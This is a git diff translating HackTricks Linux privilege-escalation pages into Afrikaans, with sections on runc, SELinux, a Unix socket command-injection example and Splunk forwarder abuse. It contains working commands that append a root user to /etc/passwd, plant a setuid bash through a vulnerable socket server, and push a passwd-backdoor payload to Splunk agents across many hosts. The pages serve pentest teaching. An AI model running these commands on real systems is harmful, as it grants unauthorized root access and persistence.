SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/linux-hardening/privilege-escalation/runc-privilege-escalation.md index 9a4fff6e0..dc91c1591 100644 --- a/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -1,22 +1,22 @@ -# RunC Privilege Escalation +# RunC Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Basic information +## Basiese inligting -If you want to learn more about **runc** check the following page: +As jy meer wil leer oor **runc**, kyk na die volgende bladsy: {% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} [2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md) @@ -24,22 +24,21 @@ If you want to learn more about **runc** check the following page: ## PE -If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**. - +As jy vind dat `runc` op die gasheer geïnstalleer is, kan jy dalk **'n houer hardloop wat die wortel /-vouer van die gasheer monteer**. ```bash runc -help #Get help and see if runc is intalled runc spec #This will create the config.json file in your current folder Inside the "mounts" section of the create config.json add the following lines: { - "type": "bind", - "source": "/", - "destination": "/", - "options": [ - "rbind", - "rw", - "rprivate" - ] +"type": "bind", +"source": "/", +"destination": "/", +"options": [ +"rbind", +"rw", +"rprivate" +] }, #Once you have modified the config.json file, create the folder rootfs in the same directory @@ -49,21 +48,20 @@ mkdir rootfs # The root folder is the one from the host runc run demo ``` - {% hint style="danger" %} -This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers. +Dit sal nie altyd werk nie, aangesien die verstekbedryf van runc is om as root uit te voer, so om dit as 'n onbevoorregte gebruiker uit te voer, kan eenvoudig nie werk nie (tensy jy 'n rootless-konfigurasie het). Om 'n rootless-konfigurasie die verstek te maak, is oor die algemeen nie 'n goeie idee nie, omdat daar heelwat beperkings binne rootless-houers is wat nie buite rootless-houers van toepassing is nie. {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/selinux.md b/linux-hardening/privilege-escalation/selinux.md index 4550835bc..eac5b99fd 100644 --- a/linux-hardening/privilege-escalation/selinux.md +++ b/linux-hardening/privilege-escalation/selinux.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# SELinux in Containers +# SELinux in Houers -[Introduction and example from the redhat docs](https://www.redhat.com/sysadmin/privileged-flag-container-engines) +[Introduksie en voorbeeld van die redhat-dokumentasie](https://www.redhat.com/sysadmin/privileged-flag-container-engines) -[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is a **labeling** **system**. Every **process** and every **file** system object has a **label**. SELinux policies define rules about what a **process label is allowed to do with all of the other labels** on the system. - -Container engines launch **container processes with a single confined SELinux label**, usually `container_t`, and then set the container inside of the container to be labeled `container_file_t`. The SELinux policy rules basically say that the **`container_t` processes can only read/write/execute files labeled `container_file_t`**. If a container process escapes the container and attempts to write to content on the host, the Linux kernel denies access and only allows the container process to write to content labeled `container_file_t`. +[SELinux](https://www.redhat.com/en/blog/latest-container-exploit-runc-can-be-blocked-selinux) is 'n **etiketteringstelsel**. Elke **proses** en elke **lêersisteemobjek** het 'n **etiket**. SELinux-beleide definieer reëls oor wat 'n **prosesetiket mag doen met al die ander etikette** op die stelsel. +Houer-enjins begin **houerprosesse met 'n enkele beperkte SELinux-etiket**, gewoonlik `container_t`, en stel dan die houer binne die houer in om geëtiketteer te word as `container_file_t`. Die SELinux-beleidreëls sê basies dat die **`container_t`-prosesse slegs lêes/skryf/voer lêers uit wat geëtiketteer is as `container_file_t`**. As 'n houerproses ontsnap uit die houer en probeer skryf na inhoud op die gasheer, weier die Linux-kernel toegang en laat slegs die houerproses toe om te skryf na inhoud wat geëtiketteer is as `container_file_t`. ```shell $ podman run -d fedora sleep 100 d4194babf6b877c7100e79de92cd6717166f7302113018686cea650ea40bd7cb @@ -30,24 +27,6 @@ $ podman top -l label LABEL system_u:system_r:container_t:s0:c647,c780 ``` +# SELinux Gebruikers -# SELinux Users - -There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users. - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - +Daar is SELinux-gebruikers bo en behalwe die gewone Linux-gebruikers. SELinux-gebruikers maak deel uit van 'n SELinux-beleid. Elke Linux-gebruiker word gekarteer na 'n SELinux-gebruiker as deel van die beleid. Dit stel Linux-gebruikers in staat om die beperkings en sekuriteitsreëls en -meganismes wat op SELinux-gebruikers geplaas is, te erf. diff --git a/linux-hardening/privilege-escalation/socket-command-injection.md b/linux-hardening/privilege-escalation/socket-command-injection.md index 89d216a95..8c2c06b64 100644 --- a/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/linux-hardening/privilege-escalation/socket-command-injection.md @@ -1,77 +1,67 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Socket binding example with Python +## Voorbeeld van sokkelbinding met Python -In the following example a **unix socket is created** (`/tmp/socket_test.s`) and everything **received** is going to be **executed** by `os.system`.I know that you aren't going to find this in the wild, but the goal of this example is to see how a code using unix sockets looks like, and how to manage the input in the worst case possible. +In die volgende voorbeeld word 'n **Unix-sokkel geskep** (`/tmp/socket_test.s`) en alles wat **ontvang** word, sal uitgevoer word deur `os.system`. Ek weet dat jy dit nie in die wild gaan vind nie, maar die doel van hierdie voorbeeld is om te sien hoe 'n kode wat Unix-sokkels gebruik, lyk, en hoe om die inset in die ergste geval te hanteer. {% code title="s.py" %} ```python import socket import os, os.path import time -from collections import deque +from collections import deque if os.path.exists("/tmp/socket_test.s"): - os.remove("/tmp/socket_test.s") +os.remove("/tmp/socket_test.s") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind("/tmp/socket_test.s") os.system("chmod o+w /tmp/socket_test.s") while True: - server.listen(1) - conn, addr = server.accept() - datagram = conn.recv(1024) - if datagram: - print(datagram) - os.system(datagram) - conn.close() +server.listen(1) +conn, addr = server.accept() +datagram = conn.recv(1024) +if datagram: +print(datagram) +os.system(datagram) +conn.close() ``` {% endcode %} -**Execute** the code using python: `python s.py` and **check how the socket is listening**: - +**Voer** die kode uit met behulp van Python: `python s.py` en **kontroleer hoe die sokket luister**: ```python netstat -a -p --unix | grep "socket_test" (Not all processes could be identified, non-owned process info - will not be shown, you would have to be root to see it all.) +will not be shown, you would have to be root to see it all.) unix 2 [ ACC ] STREAM LISTENING 901181 132748/python /tmp/socket_test.s ``` - -**Exploit** - +**Uitbuiting** ```python echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/socket_test.s ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index 65996b6dd..67c11e3fd 100644 --- a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md @@ -1,77 +1,76 @@ -# Splunk LPE and Persistence +# Splunk LPE en Volharding
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If **enumerating** a machine **internally** or **externally** you find **Splunk running** (port 8090), if you luckily know any **valid credentials** you can **abuse the Splunk service** to **execute a shell** as the user running Splunk. If root is running it, you can escalate privileges to root. +As jy 'n masjien **intern** of **ekstern ondersoek** en jy vind **Splunk wat loop** (poort 8090), as jy gelukkig enige **geldige geloofsbriewe** ken, kan jy die Splunk-diens misbruik om 'n skul te **uitvoer** as die gebruiker wat Splunk laat loop. As root dit laat loop, kan jy voorregte na root eskaleer. -Also if you are **already root and the Splunk service is not listening only on localhost**, you can **steal** the **password** file **from** the Splunk service and **crack** the passwords, or **add new** credentials to it. And maintain persistence on the host. +As jy reeds root is en die Splunk-diens nie net op die localhost luister nie, kan jy die wagwoordlêer **van** die Splunk-diens **steel** en die wagwoorde **kraak**, of **nuwe** geloofsbriewe daaraan toevoeg. En volharding op die gasheer handhaaf. -In the first image below you can see how a Splunkd web page looks like. +In die eerste prentjie hieronder kan jy sien hoe 'n Splunkd-webblad lyk. -## Splunk Universal Forwarder Agent Exploit Summary +## Splunk Universal Forwarder Agent Exploit Opsomming -For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary: +Vir verdere besonderhede, kyk na die pos [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). Hierdie is net 'n opsomming: -**Exploit Overview:** -An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network. +**Exploit-oorsig:** +'n Exploit wat die Splunk Universal Forwarder Agent (UF) teiken, maak dit vir aanvallers met die agentwagwoord moontlik om arbitrêre kode op stelsels wat die agent laat loop, uit te voer, wat potensieel 'n hele netwerk kan benadeel. -**Key Points:** -- The UF agent does not validate incoming connections or the authenticity of code, making it vulnerable to unauthorized code execution. -- Common password acquisition methods include locating them in network directories, file shares, or internal documentation. -- Successful exploitation can lead to SYSTEM or root level access on compromised hosts, data exfiltration, and further network infiltration. +**Kernpunte:** +- Die UF-agent valideer nie inkomende verbindings of die egtheid van kode nie, wat dit vatbaar maak vir ongemagtigde kode-uitvoering. +- Gewone metodes vir die verkryging van wagwoorde sluit in die vind daarvan in netwerkgidslys, lêerdeling of interne dokumentasie. +- Suksesvolle uitbuiting kan lei tot toegang op die vlak van SYSTEM of root op gekompromitteerde gasheer, data-uitvoer en verdere netwerkinfiltrasie. -**Exploit Execution:** -1. Attacker obtains the UF agent password. -2. Utilizes the Splunk API to send commands or scripts to the agents. -3. Possible actions include file extraction, user account manipulation, and system compromise. +**Uitbuiting van Exploit:** +1. Aanvaller verkry die UF-agentwagwoord. +2. Maak gebruik van die Splunk API om opdragte of skripte na die agente te stuur. +3. Moontlike aksies sluit lêeronttrekking, manipulasie van gebruikersrekeninge en stelselkompromittering in. -**Impact:** -- Full network compromise with SYSTEM/root level permissions on each host. -- Potential for disabling logging to evade detection. -- Installation of backdoors or ransomware. +**Impak:** +- Volledige netwerkbenadeling met SYSTEM/root-vlak-toestemmings op elke gasheer. +- Moontlikheid om logboekinskrywings te deaktiveer om opsporing te ontduik. +- Installasie van agterdeure of losprysware. -**Example Command for Exploitation:** +**Voorbeeldopdrag vir Uitbuiting:** ```bash for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done ``` - -**Usable public exploits:** +**Bruikbare openbare exploits:** * https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2 * https://www.exploit-db.com/exploits/46238 * https://www.exploit-db.com/exploits/46487 -## Abusing Splunk Queries +## Misbruik van Splunk-aanvragen -**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** +**Vir verdere besonderhede, kyk na die pos [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)** -The **CVE-2023-46214** allowed to upload an arbitrary script to **`$SPLUNK_HOME/bin/scripts`** and then explained that using the search query **`|runshellscript script_name.sh`** it was possible to **execute** the **script** stored in there. +Die **CVE-2023-46214** het dit moontlik gemaak om 'n willekeurige skripsie na **`$SPLUNK_HOME/bin/scripts`** te laai en het toe verduidelik dat dit moontlik was om die skripsie wat daar gestoor is, uit te voer deur die soekvraag **`|runshellscript script_name.sh`** te gebruik.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index 5e1a783b1..0754279b4 100644 --- a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md @@ -1,61 +1,53 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
